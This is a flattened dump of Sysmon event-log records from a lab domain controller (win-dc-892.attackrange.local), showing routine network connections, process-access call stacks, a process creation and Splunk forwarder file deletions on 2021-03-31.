354300x800000000000000010223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.397{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60190- 354300x800000000000000010222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.395{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63386- 354300x800000000000000010221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.394{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58345- 354300x800000000000000010220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.393{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63723- 354300x800000000000000010219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.392{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55281- 354300x800000000000000010218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.391{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54956- 354300x800000000000000010217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.384{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53679-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x800000000000000010216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.384{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53679-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 23542300x800000000000000010274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.996{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D46A372A73AD08D4090AFDDF43118C3,SHA256=D401E2B2F62E24B8B86372BA9623AE7808A6D95799493926355F4B698F0FFBC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.871{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.668{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.668{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.668{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.668{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.668{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-65F0-6064-5F01-00000000AE01}6192C:\Windows\System32\InstallAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-65F0-6064-5F01-00000000AE01}6192C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-65F0-6064-5F01-00000000AE01}6192C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-65F0-6064-5F01-00000000AE01}6192C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.660{266CAFBE-65F0-6064-5F01-00000000AE01}6192C:\Windows\System32\InstallAgent.exe10.0.14393.4169 (rs1_release.210107-1130)InstallAgentMicrosoft® Windows® Operating SystemMicrosoft CorporationInstallAgent.exeC:\Windows\System32\InstallAgent.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=88C7DCDD735B31E4F5620E4B9F38C87F,SHA256=5EF1322B96F176C4EA4B8304CAF8B45E2E42C3188AA82ED1FD6196AFC04B7297,IMPHASH=EAB6EF3DE625719627DC808B5F0501FC{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000010259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.621{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.621{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.621{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.621{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.621{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.824{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F73CE7679518FC7A62502232EB32DA6,SHA256=6C1E68034CBE6E50EF0978D8A6FC94AE20A96CC19693CCE8D7D4319A66BDD820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.824{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD1B69D2A7563846DA5258F220E87FF2,SHA256=5C93703A25BAC76EBD45731A98181C3B5E55A5B6B87792B860B0870ABE146A93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:14.043{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73D49C7ED7359A216D50E87A709F6A07,SHA256=5CEDAE3347EB370282DDBD18C6C6808BA331E9AC2351C4B8CB9EDF866019AD9D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.262{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53682-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x800000000000000010281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.262{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53682-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x800000000000000010280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.160{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53681-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x800000000000000010279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.160{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53681-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x800000000000000010278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.152{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53680-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:13.152{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53680-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 23542300x800000000000000010285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:15.167{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 